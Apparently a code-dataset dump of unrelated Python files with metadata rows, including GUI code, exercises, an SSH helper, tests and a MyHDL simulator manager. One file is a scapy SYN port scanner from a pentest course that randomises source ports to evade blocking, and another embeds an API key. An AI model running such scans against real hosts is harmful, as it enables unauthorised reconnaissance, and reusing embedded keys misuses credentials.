def show_table_changer(self, widget):
self._width_ratio = 25
self._height_ratio = 70
def factory_method():
dialog = urwid.AttrMap(urwid.LineBox(widget, title=u'Change table'), 'linebox')
urwid.connect_signal(widget, widget.SIGNAL_ESCAPE, self.close_pop_up)
return dialog
self._popup_factory_method = factory_method
result = self.open_pop_up()
shared_main_loop.refresh()
return result
def _reset_popup_size_ratio(self):
self._width_ratio = self.DEFAULT_WR
self._height_ratio = self.DEFAULT_HR
def render(self, size, focus=False):
self._max_width, self._max_height = size
return super().render(size, focus)
| 34.113208 | 91 | 0.6309 | 658 | 5,424 | 4.869301 | 0.18693 | 0.093321 | 0.034332 | 0.061798 | 0.5902 | 0.526217 | 0.456305 | 0.456305 | 0.456305 | 0.427591 | 0 | 0.007176 | 0.280605 | 5,424 | 158 | 92 | 34.329114 | 0.813942 | 0.030236 | 0 | 0.459677 | 0 | 0 | 0.028566 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.201613 | false | 0 | 0.040323 | 0.008065 | 0.419355 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca2e5ef930ba43da3724f81c6111b142413377f8 | 266 | py | Python | Desafios/Desafio110.py | vaniaferreira/Python | 5b3158836d47c0bb7bc446e6636e7b3dcea8a0ab | [
"MIT"
] | null | null | null | Desafios/Desafio110.py | vaniaferreira/Python | 5b3158836d47c0bb7bc446e6636e7b3dcea8a0ab | [
"MIT"
] | null | null | null | Desafios/Desafio110.py | vaniaferreira/Python | 5b3158836d47c0bb7bc446e6636e7b3dcea8a0ab | [
"MIT"
] | null | null | null | #Adicione ao módulo moeda.py criado nos desafios anteriores, uma função chamada resumo(), que mostre na tela algumas
#informaçôes geradas pelas funções que já temos no módulo criado até aqui.
import moeda
p = float(input('Preço: R$'))
moeda.resumo(p, 20, 12)
| 20.461538 | 116 | 0.74812 | 42 | 266 | 4.738095 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0181 | 0.169173 | 266 | 12 | 117 | 22.166667 | 0.882353 | 0.706767 | 0 | 0 | 0 | 0 | 0.126761 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
ca32957679bae1dd771e128856697fc064b21819 | 1,066 | py | Python | devices/ssh_connection.py | premandfriends/boardfarm-1 | 3c952c94507fff25ba9955cad993610ea4a95e2e | [
"BSD-3-Clause-Clear"
] | 74 | 2015-08-25T22:50:38.000Z | 2022-01-04T16:32:00.000Z | devices/ssh_connection.py | premandfriends/boardfarm-1 | 3c952c94507fff25ba9955cad993610ea4a95e2e | [
"BSD-3-Clause-Clear"
] | 72 | 2015-10-12T17:42:47.000Z | 2019-01-19T14:11:18.000Z | devices/ssh_connection.py | mgualco-contractor/boardfarm | 6a033e5dc84c7368fdd8ec2738b08b35ca7b07e7 | [
"BSD-3-Clause-Clear"
] | 50 | 2015-08-25T22:45:44.000Z | 2022-01-05T09:47:04.000Z | import pexpect
class SshConnection:
'''
To use, set conn_cmd in your json to "ssh root@192.168.1.1 -i ~/.ssh/id_rsa""
and set connection_type to "ssh"
'''
def __init__(self, device=None, conn_cmd=None, ssh_password='None', **kwargs):
self.device = device
self.conn_cmd = conn_cmd
self.ssh_password = ssh_password
def connect(self):
pexpect.spawn.__init__(self.device,
command='/bin/bash',
args=['-c', self.conn_cmd])
try:
result = self.device.expect(["assword:", "passphrase"] + self.device.prompt)
except pexpect.EOF as e:
raise Exception("Board is in use (connection refused).")
if result == 0 or result == 1:
assert self.ssh_password is not None, "Please add ssh_password in your json configuration file."
self.device.sendline(self.ssh_password)
self.device.expect(self.device.prompt)
def close(self):
self.device.sendline('exit')
| 34.387097 | 108 | 0.586304 | 134 | 1,066 | 4.507463 | 0.477612 | 0.149007 | 0.074503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013405 | 0.300188 | 1,066 | 30 | 109 | 35.533333 | 0.796247 | 0.103189 | 0 | 0 | 0 | 0 | 0.140845 | 0 | 0 | 0 | 0 | 0 | 0.05 | 1 | 0.15 | false | 0.25 | 0.05 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
ca3bd3a376645b025849e3f06f5829483ac7b31b | 222 | py | Python | 10 days of statistics/Day5PoissonDistribution2.py | rahamath2009/git-github.com-nishant-sethi-HackerRank | 14d9bd3e772a863aceba22d9a3361a8325cca4bc | [
"Apache-2.0"
] | 76 | 2018-06-28T04:29:14.000Z | 2022-03-21T01:57:27.000Z | 10 days of statistics/Day5PoissonDistribution2.py | rahamath2009/git-github.com-nishant-sethi-HackerRank | 14d9bd3e772a863aceba22d9a3361a8325cca4bc | [
"Apache-2.0"
] | 31 | 2018-10-01T09:12:05.000Z | 2022-03-08T23:39:01.000Z | 10 days of statistics/Day5PoissonDistribution2.py | rahamath2009/git-github.com-nishant-sethi-HackerRank | 14d9bd3e772a863aceba22d9a3361a8325cca4bc | [
"Apache-2.0"
] | 44 | 2018-07-09T11:31:20.000Z | 2022-01-12T19:21:20.000Z | '''
Created on May 28, 2018
@author: nishant.sethi
'''
import math
mean_x=0.88
mean_y=1.55
result_x=160+40*(mean_x+mean_x**2)
result_y=128+40*(mean_y+mean_y**2)
print(round(result_x,3))
print(round(result_y,3)) | 18.5 | 35 | 0.693694 | 46 | 222 | 3.130435 | 0.543478 | 0.104167 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134021 | 0.126126 | 222 | 12 | 36 | 18.5 | 0.608247 | 0.211712 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.285714 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca44efe3a14324ad455173735e360004c5e5aad2 | 2,136 | py | Python | PortScan/portScan.py | Pter18/PruebasPentest | 4775a686fe1b82a4227b16a91e1f11de6a38ba3c | [
"MIT"
] | null | null | null | PortScan/portScan.py | Pter18/PruebasPentest | 4775a686fe1b82a4227b16a91e1f11de6a38ba3c | [
"MIT"
] | null | null | null | PortScan/portScan.py | Pter18/PruebasPentest | 4775a686fe1b82a4227b16a91e1f11de6a38ba3c | [
"MIT"
] | null | null | null | #|/bin/python
'''
Rodriguez Gallardo Pedro Alejandro
Plan de Becarios generacion 13
Curso: Pruebas de penetracion
Programa que escanea una IP y detenrmina los puertos
abiertos con ayuda de scapy.
'''
import time
from scapy.all import *
# IP a escanear
ip = "192.168.2.70"
# Cuenta de puertos cerrados
closed_ports = 0
# Arreglo donde almacenaremos los puertos abiertos que encontremos.
open_ports = []
# Funcion que no ayuda a determinar si el equipo con la IP solicitada esta encendida
def is_up(ip):
# Realizamos un PING
icmp = IP(dst=ip)/ICMP()
resp = sr1(icmp, timeout=10)
if resp == None:
return False
else:
return True
if __name__ == '__main__':
# Deshabilitamos el modo verbose en sr(), sr1()
conf.verb = 0
# Rango de puertos a escanear 1 - 1024
ports = range(1, 1024)
if is_up(ip):
print "Host %s esta encendido." % ip
print "Iniciando escaneo..."
for port in ports:
# Establecemos un puerto aleatorio de origen por cada puerto a consultar, para evitar ser bloqueados.
src_port = RandShort()
# Creamos un request tipo TCP - SYN
p_tcp = IP(dst=ip)/TCP(sport=src_port, dport=port, flags='S')
# Envio request
resp = sr1(p_tcp, timeout=2)
if str(type(resp)) == "<type 'NoneType'>":
closed_ports += 1 # aumentamos la cuenta
elif resp.haslayer(TCP):
# 0x12 = SYN/ACK Puerto Abierto
if resp.getlayer(TCP).flags == 0x12:
send_rst = sr(IP(dst=ip)/TCP(sport=src_port, dport=port, flags='AR'), timeout=1)
open_ports.append(port) # Agregamos a la lista
# 0x14 = SYN/RST Puerto Cerrado
elif resp.getlayer(TCP).flags == 0x14:
closed_ports += 1 # aumentamos la cuenta
if len(open_ports) != 0:
for o_port in open_ports:
print "%d open" % o_port
print "%d puertos cerrados de %d puertos escaneados" % (closed_ports, len(ports))
else:
print "Host %s esta apagado." % ip
| 35.016393 | 113 | 0.603933 | 289 | 2,136 | 4.373702 | 0.49481 | 0.03481 | 0.016614 | 0.022152 | 0.10443 | 0.10443 | 0.056962 | 0.056962 | 0.056962 | 0.056962 | 0 | 0.030181 | 0.301966 | 2,136 | 60 | 114 | 35.6 | 0.817572 | 0.269195 | 0 | 0.111111 | 0 | 0 | 0.114054 | 0 | 0 | 0 | 0.005887 | 0 | 0 | 0 | null | null | 0 | 0.055556 | null | null | 0.138889 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca495ff6d99e320548bea5450f91415d2d462394 | 836 | py | Python | pygfa/operations.py | Francesco2304/pygfa | 9bf6fb5f0a959685300ab863a0e716a2268109f7 | [
"MIT"
] | 3 | 2020-06-25T22:47:02.000Z | 2022-02-27T15:16:02.000Z | pygfa/operations.py | Francesco2304/pygfa | 9bf6fb5f0a959685300ab863a0e716a2268109f7 | [
"MIT"
] | 3 | 2017-08-08T12:24:23.000Z | 2022-02-27T15:17:25.000Z | pygfa/operations.py | Francesco2304/pygfa | 9bf6fb5f0a959685300ab863a0e716a2268109f7 | [
"MIT"
] | 4 | 2019-02-04T20:54:53.000Z | 2020-05-14T19:52:24.000Z | from networkx.algorithms.components.connected import node_connected_component as nx_node_connected_component
from networkx.algorithms.components.connected import connected_components as nx_connected_components
import pygfa.gfa # required for GFAError (gives error otherwise)
def nodes_connected_component(gfa_, nid):
"""Return the connected component
belonging to the given node.
:param nid: The id of the node to find the reachable nodes.
"""
if nid not in gfa_:
raise pygfa.gfa.GFAError("The source node is not in the graph.")
return nx_node_connected_component(\
gfa_._graph, nid)
def nodes_connected_components(gfa_):
"""Return a generator of sets with nodes of each weakly
connected component in the graph.
"""
return nx_connected_components(gfa_._graph)
| 38 | 108 | 0.748804 | 113 | 836 | 5.327434 | 0.389381 | 0.179402 | 0.109635 | 0.106312 | 0.215947 | 0.156146 | 0 | 0 | 0 | 0 | 0 | 0 | 0.191388 | 836 | 21 | 109 | 39.809524 | 0.890533 | 0.303828 | 0 | 0 | 0 | 0 | 0.065574 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.3 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
ca4e61922979fa286da153af698ea6dab0729124 | 266 | py | Python | server/opendp_apps/model_helpers/msg_util.py | mikephelan/opendp-ux | 80c65da0ed17adc01c69b05dbc9cbf3a5973a016 | [
"MIT"
] | 6 | 2021-05-25T18:50:58.000Z | 2022-03-23T19:52:15.000Z | server/opendp_apps/model_helpers/msg_util.py | mikephelan/opendp-ux | 80c65da0ed17adc01c69b05dbc9cbf3a5973a016 | [
"MIT"
] | 298 | 2021-05-19T17:34:09.000Z | 2022-03-29T18:45:22.000Z | server/opendp_apps/model_helpers/msg_util.py | opendp/dpcreator | 6ba3c58ecdcd81ca1f4533a14ce7604eccf6a646 | [
"MIT"
] | 2 | 2020-10-16T22:03:24.000Z | 2020-11-15T22:45:19.000Z | def msg(m):
"""
Shorthand for print statement
"""
print(m)
def dashes(cnt=40):
"""
Print dashed line
"""
msg('-' * cnt)
def msgt(m):
"""
Add dashed line pre/post print statment
"""
dashes()
msg(m)
dashes()
| 12.090909 | 43 | 0.492481 | 32 | 266 | 4.09375 | 0.53125 | 0.061069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011494 | 0.345865 | 266 | 21 | 44 | 12.666667 | 0.741379 | 0.327068 | 0 | 0.25 | 0 | 0 | 0.007519 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0 | 0 | 0 | 0.375 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca56829f893d1be24d8f759f0e5d686d90b4ce8d | 1,467 | py | Python | scrapy/selector/lxmlsel.py | hobson/scrapy | 9f2465fb81628f2bb70d8d03fd23aa41e9801eae | [
"BSD-3-Clause"
] | null | null | null | scrapy/selector/lxmlsel.py | hobson/scrapy | 9f2465fb81628f2bb70d8d03fd23aa41e9801eae | [
"BSD-3-Clause"
] | null | null | null | scrapy/selector/lxmlsel.py | hobson/scrapy | 9f2465fb81628f2bb70d8d03fd23aa41e9801eae | [
"BSD-3-Clause"
] | null | null | null | """
XPath selectors based on lxml
"""
from .unified import Selector, SelectorList
__all__ = ['HtmlXPathSelector', 'XmlXPathSelector', 'XPathSelector',
'XPathSelectorList']
class XPathSelector(Selector):
__slots__ = ()
_default_type = 'html'
def __init__(self, *a, **kw):
import warnings
from scrapy.exceptions import ScrapyDeprecationWarning
warnings.warn('%s is deprecated, instantiate scrapy.selector.Selector '
'instead' % type(self).__name__,
category=ScrapyDeprecationWarning, stacklevel=1)
super(XPathSelector, self).__init__(*a, **kw)
def css(self, *a, **kw):
raise RuntimeError('.css() method not available for %s, '
'instantiate scrapy.selector.Selector '
'instead' % type(self).__name__)
class XmlXPathSelector(XPathSelector):
__slots__ = ()
_default_type = 'xml'
class HtmlXPathSelector(XPathSelector):
__slots__ = ()
_default_type = 'html'
class XPathSelectorList(SelectorList):
def __init__(self, *a, **kw):
import warnings
from scrapy.exceptions import ScrapyDeprecationWarning
warnings.warn('XPathSelectorList is deprecated, instantiate '
'scrapy.selector.SelectorList instead',
category=ScrapyDeprecationWarning, stacklevel=1)
super(XPathSelectorList, self).__init__(*a, **kw)
| 30.5625 | 79 | 0.637355 | 127 | 1,467 | 7 | 0.377953 | 0.016873 | 0.053993 | 0.044994 | 0.482565 | 0.31946 | 0.31946 | 0.31946 | 0.202475 | 0.202475 | 0 | 0.001843 | 0.260395 | 1,467 | 47 | 80 | 31.212766 | 0.817512 | 0.019768 | 0 | 0.419355 | 0 | 0 | 0.207692 | 0.053147 | 0 | 0 | 0 | 0 | 0 | 1 | 0.096774 | false | 0 | 0.16129 | 0 | 0.580645 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
ca605c6ef1b2ca158ae12b5e670631d41c835b07 | 302 | py | Python | src/myResume.py | charlielin99/Jobalytics | cf0461eb3862e375032cfe2ef05eadf7bf465fec | [
"MIT"
] | 13 | 2018-08-19T14:10:32.000Z | 2021-10-01T20:20:38.000Z | src/myResume.py | charlielin99/Jobalytics | cf0461eb3862e375032cfe2ef05eadf7bf465fec | [
"MIT"
] | 1 | 2021-04-06T04:58:43.000Z | 2021-04-06T04:58:43.000Z | src/myResume.py | charlielin99/Jobalytics | cf0461eb3862e375032cfe2ef05eadf7bf465fec | [
"MIT"
] | 4 | 2018-09-20T19:43:29.000Z | 2020-01-23T10:33:16.000Z | import indicoio, os, json
indicoio.config.api_key = '27df1eee04c5b65fb3113e9458d1d701'
fileDir = os.path.dirname(os.path.realpath('__file__'))
fileResumeTxt = open(os.path.join(fileDir, "data/resume.txt"), 'w')
resume = "data/resumePDF.pdf"
print(json.dumps(indicoio.pdf_extraction(resume))) | 33.555556 | 68 | 0.751656 | 38 | 302 | 5.815789 | 0.657895 | 0.081448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07326 | 0.096026 | 302 | 9 | 69 | 33.555556 | 0.736264 | 0 | 0 | 0 | 0 | 0 | 0.250847 | 0.108475 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca6901950982a690817b33bf00b4352b3b47bec5 | 10,056 | py | Python | test/unit/parser/test_parser_helper.py | buddly27/champollion | aa53804ad11e32f1bb8dcb02668c6df3771efcaa | [
"Apache-2.0"
] | 3 | 2017-06-13T01:36:32.000Z | 2020-12-14T18:26:01.000Z | test/unit/parser/test_parser_helper.py | buddly27/champollion | aa53804ad11e32f1bb8dcb02668c6df3771efcaa | [
"Apache-2.0"
] | 1 | 2018-09-27T16:13:48.000Z | 2020-06-03T22:27:56.000Z | test/unit/parser/test_parser_helper.py | buddly27/champollion | aa53804ad11e32f1bb8dcb02668c6df3771efcaa | [
"Apache-2.0"
] | null | null | null | # :coding: utf-8
import pytest
import os
import champollion.parser.helper
@pytest.mark.parametrize(
("content_lines", "line_number", "expected"),
[
(
[
"/**",
" * An function example.",
" *",
" * Detailed description.",
" *",
" * .. note::",
" *",
" * A note.",
" */",
"function sum(a, b) {",
" return a+b;",
"}",
],
10,
(
"An function example.\n"
"\n"
"Detailed description.\n"
"\n"
".. note::\n"
"\n"
" A note."
)
),
(
[
"/** A cool data. */",
"const Data = null",
],
2,
(
"A cool data."
)
),
(
[
"/*",
" * Incorrect docstring",
" */",
"function doSomething() {",
" console.log('something');",
"}",
],
4,
None
),
(
[
"/*",
"",
" Incorrect docstring",
"",
"*/",
"function doSomethingElse() {",
" console.log('something_else');",
"}",
],
6,
None
),
(
[
"// Incorrect docstring",
"function doSomethingElse() {",
" console.log('something_else');",
"}",
],
2,
None
),
(
[
"",
"function doSomethingElse() {",
" console.log('something_else');",
"}",
],
2,
None
),
(
[
"/** A cool data. */",
"const Data = null",
],
1,
None
)
],
ids=[
"valid element line number with multiline docstring",
"valid element line number with one line docstring",
"valid element line number with incorrect docstring 1",
"valid element line number with incorrect docstring 2",
"valid element line number with incorrect docstring 3",
"valid element line number with no docstring",
"invalid line_number",
]
)
def test_get_docstrings(content_lines, line_number, expected):
"""Return docstrings from a element's line number."""
assert champollion.parser.helper.get_docstring(
line_number, content_lines
) == expected
def test_filter_comments():
"""Remove all comments from content"""
content = (
"'use strict'; /* a beautiful comment */\n"
"\n"
"/*\n"
"a long comment that can take a lot of places so\n"
"we put it on several lines.\n"
"*/\n"
"\n"
"// a data docstring\n"
"const DATA = 1;\n"
"\n"
"/**\n"
" * Function docstring\n"
" */\n"
"function sum(a, b) {\n"
" // Return the sum of a and b\n"
" return a+b;\n"
"}\n"
"\n"
"const url = 'http://somewhere.com';\n"
"\n"
)
expected = (
"'use strict'; \n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"const DATA = 1;\n"
"\n"
"\n"
"\n"
"\n"
"function sum(a, b) {\n"
" \n"
" return a+b;\n"
"}\n"
"\n"
"const url = 'http://somewhere.com';\n"
"\n"
)
assert champollion.parser.helper.filter_comments(content) == expected
def test_filter_comments_keep_content_size():
"""Remove all comments from content while keeping content size."""
content = (
"'use strict'; /* a beautiful comment */\n"
"\n"
"/*\n"
"a long comment that can take a lot of places so\n"
"we put it on several lines.\n"
"*/\n"
"\n"
"// a data docstring\n"
"const DATA = 1;\n"
"\n"
"/**\n"
" * Function docstring\n"
" */\n"
"function sum(a, b) {\n"
" // Return the sum of a and b\n"
" return a+b;\n"
"}\n"
"\n"
"const url = 'http://somewhere.com';\n"
"\n"
)
expected = (
"'use strict'; {comment1}\n"
"\n"
"{comment2}\n"
"\n"
"\n"
"\n"
"\n"
"{comment3}\n"
"const DATA = 1;\n"
"\n"
"{comment4}\n"
"\n"
"\n"
"function sum(a, b) {{\n"
" {comment5}\n"
" return a+b;\n"
"}}\n"
"\n"
"const url = 'http://somewhere.com';\n"
"\n"
).format(
comment1=" " * len("/* a beautiful comment */"),
comment2=" " * len(
"/*"
"a long comment that can take a lot of places so"
"we put it on several lines."
"*/"
),
comment3=" " * len("// a data docstring"),
comment4=" " * len(
"/**"
" * Function docstring"
" */"
),
comment5=" " * len("// Return the sum of a and b")
)
assert champollion.parser.helper.filter_comments(
content, keep_content_size=True
) == expected
def test_filter_comments_without_multiline_comments():
"""Remove all comments from content without multiline comments."""
content = (
"'use strict'; /* a beautiful comment */\n"
"\n"
"/*\n"
"a long comment that can take a lot of places so\n"
"we put it on several lines.\n"
"*/\n"
"\n"
"// a data docstring\n"
"const DATA = 1;\n"
"\n"
"/**\n"
" * Function docstring\n"
" */\n"
"function sum(a, b) {\n"
" // Return the sum of a and b\n"
" return a+b;\n"
"}\n"
"\n"
"const url = 'http://somewhere.com';\n"
"\n"
)
expected = (
"'use strict'; /* a beautiful comment */\n"
"\n"
"/*\n"
"a long comment that can take a lot of places so\n"
"we put it on several lines.\n"
"*/\n"
"\n"
"\n"
"const DATA = 1;\n"
"\n"
"/**\n"
" * Function docstring\n"
" */\n"
"function sum(a, b) {\n"
" \n"
" return a+b;\n"
"}\n"
"\n"
"const url = 'http://somewhere.com';\n"
"\n"
)
assert champollion.parser.helper.filter_comments(
content, filter_multiline_comment=False
) == expected
@pytest.mark.parametrize(
("content", "expected_content", "expected_collapsed_content"),
[
(
"const emptyObject = {};",
"const emptyObject = {};",
{}
),
(
"let test = {a: 1, b: 2, c: 3};",
"let test = {};",
{
1: "{a: 1, b: 2, c: 3}"
}
),
(
(
"const element = {\n"
" key1: value1,\n"
" key2: value2,\n"
" key3: value3,\n"
"};\n"
"\n"
"function sum(a, b) {\n"
" return a+b\n"
"}\n"
"\n"
),
(
"const element = {}\n"
"\n"
"\n"
"\n"
";\n"
"\n"
"function sum(a, b) {}\n"
"\n"
"\n"
"\n"
),
{
1: (
"{\n"
" key1: value1,\n"
" key2: value2,\n"
" key3: value3,\n"
"}"
),
7: "{\n"
" return a+b\n"
"}"
}
),
(
(
"class AwesomeClass {\n"
" constructor() {\n"
" this.data = 1;\n"
" }\n"
"\n"
" increase() {\n"
" this.data += 1;\n"
" }\n"
"}\n"
),
(
"class AwesomeClass {}\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
),
{
1: (
"{\n"
" constructor() {\n"
" this.data = 1;\n"
" }\n"
"\n"
" increase() {\n"
" this.data += 1;\n"
" }\n"
"}"
),
2: (
"{\n"
" this.data = 1;\n"
" }"
),
6: (
"{\n"
" this.data += 1;\n"
" }"
)
}
)
],
ids=[
"empty object",
"simple object",
"objects and functions on multiple lines",
"nested class"
]
)
def test_collapse_all(content, expected_content, expected_collapsed_content):
"""Collapse all objects, classes and functions."""
assert champollion.parser.helper.collapse_all(content) == (
expected_content, expected_collapsed_content
)
| 24.952854 | 77 | 0.3393 | 836 | 10,056 | 4.028708 | 0.151914 | 0.058195 | 0.044537 | 0.023753 | 0.704572 | 0.628563 | 0.552257 | 0.49228 | 0.428741 | 0.383017 | 0 | 0.011866 | 0.513922 | 10,056 | 402 | 78 | 25.014925 | 0.677169 | 0.026154 | 0 | 0.657895 | 0 | 0 | 0.36265 | 0.014436 | 0 | 0 | 0 | 0 | 0.013158 | 1 | 0.013158 | false | 0 | 0.007895 | 0 | 0.021053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca6e2b256c330324a67fb4aa6dd0d2a9b8cc825c | 9,706 | py | Python | MyHDLSim/Manager.py | mattsnowboard/msu-myhdlsim | 5d0d881b682a72b77d9597cb84b8fdd4bd444afc | [
"BSD-2-Clause"
] | 1 | 2021-03-30T10:20:06.000Z | 2021-03-30T10:20:06.000Z | MyHDLSim/Manager.py | mattsnowboard/msu-myhdlsim | 5d0d881b682a72b77d9597cb84b8fdd4bd444afc | [
"BSD-2-Clause"
] | null | null | null | MyHDLSim/Manager.py | mattsnowboard/msu-myhdlsim | 5d0d881b682a72b77d9597cb84b8fdd4bd444afc | [
"BSD-2-Clause"
] | null | null | null | import wx
import wx.lib.ogl as ogl
from myhdl import Signal, Simulation, delay, instance, StopSimulation, now
from MyHDLSim.Wrappers.SignalWrapper import SignalWrapper
from MyHDLSim.Module import Module
from MyHDLSim.wxApplication import MainWindow, ThreadTimer, EVT_THREAD_TIMER
class Manager:
""" This class will manage the Signals and Gates and Simulator """
def __init__(self, app):
""" Given an application, create the window and canvas
Creates a top level module
Binds some events
"""
self._frame = MainWindow(None, 'Demo')
self._canvas = self._frame.GetCanvas()
self._canvas.SetManager(self)
self._app = app
# top level module
self._top = Module(self, self._canvas)
# get passed to MyHDL simulator (gates, event listening generators, etc.)
self._instances = list()
# quick look up of gates/signals by ID
self._modules = []
self._gates = []
self._signals = []
self._signalMap = {}
self._moduleMap = {}
# this is to help with showing/hiding modules
self._moduleHierarchy = []
self._displayDepth = 0
self._canvas.Bind(wx.EVT_CHAR, self.OnKey)
# Set timing events
self._pause = False
self._frame._OnPauseClick(None)
self._timer = ThreadTimer(self._frame)
self._timer.start(250)
self._frame.Bind(EVT_THREAD_TIMER, self.OnTimer)
self._canvas.SetFocus()
def CreateSignal(self, initial = None, width = 1):
""" Create a signal which we can keep track of
This needs to be done before adding switches or probes
initial: initial value of the signal (or undefined)
width: How many bits in this signal
"""
signal = SignalWrapper(self._canvas, initial, width)
self._signals.append(signal)
return signal
def CreateModule(self):
""" Create a module that a user can define
return: the module ready to be customized
"""
module = Module(self, self._canvas)
self._modules.append(module)
return module
def AddSwitch(self, pos, signal, key):
""" Add a switch to an existing signal
"""
# @todo verify we have created the signal, else it won't update
signal.SetSwitch(self._canvas, key)
signal.SetX(pos[0])
signal.SetY(pos[1])
self._signalMap[ord(key)] = signal
self._canvas.AddMyHDLSignal(signal.GetShape(), pos[0], pos[1])
def AddProbe(self, pos, a, label):
""" Add a signal visually with a label but no key events
"""
# @todo verify we have created the signal, else it won't update
signal = self.CreateSignal()
signal.SetProbe(self._canvas, a, label)
signal.SetX(pos[0])
signal.SetY(pos[1])
self._canvas.AddMyHDLSignal(signal.GetShape(), pos[0], pos[1])
def AddClock(self, pos, signal, label, period = 20):
""" Add a switch to an existing signal
"""
# @todo verify we have created the signal, else it won't update
signal.SetClockDriver(self._canvas, label, period)
signal.SetX(pos[0])
signal.SetY(pos[1])
self._canvas.AddMyHDLSignal(signal.GetShape(), pos[0], pos[1], False)
self._top._addInstance(signal)
def AddAndGate(self, pos, out, a, b, c = None, d = None):
""" Create an AND gate
This is a way to allow users to ignore the underlying module
"""
self._top.AddAndGate(pos, out, a, b, c, d)
def AddNandGate(self, pos, out, a, b, c = None, d = None):
""" Create a NAND gate
This is a way to allow users to ignore the underlying module
"""
self._top.AddNandGate(pos, out, a, b, c, d)
def AddOrGate(self, pos, out, a, b, c = None, d = None):
""" Create an OR gate
This is a way to allow users to ignore the underlying module
"""
self._top.AddOrGate(pos, out, a, b, c, d)
def AddNorGate(self, pos, out, a, b, c = None, d = None):
""" Create an NOR gate
This is a way to allow users to ignore the underlying module
"""
self._top.AddNorGate(pos, out, a, b, c, d)
def AddNotGate(self, pos, out, a):
""" Create a NOT gate
This is a way to allow users to ignore the underlying module
"""
self._top.AddNotGate(pos, out, a)
def AddXorGate(self, pos, out, a, b, c = None, d = None):
""" Create an XOR gate
This is a way to allow users to ignore the underlying module
"""
self._top.AddXorGate(pos, out, a, b, c, d)
def AddNxorGate(self, pos, out, a, b, c = None, d = None):
""" Create an NXOR gate
This is a way to allow users to ignore the underlying module
"""
self._top.AddNxorGate(pos, out, a, b, c, d)
def AddMux21(self, pos, out, select, a, b):
""" Create a 2-1 MUX
This is a way to allow users to ignore the underlying module
"""
self._top.AddMux21(pos, out, select, a, b)
def AddMux41(self, pos, out, c0, c1, d0, d1, d2, d3):
""" Create a 4-1 MUX
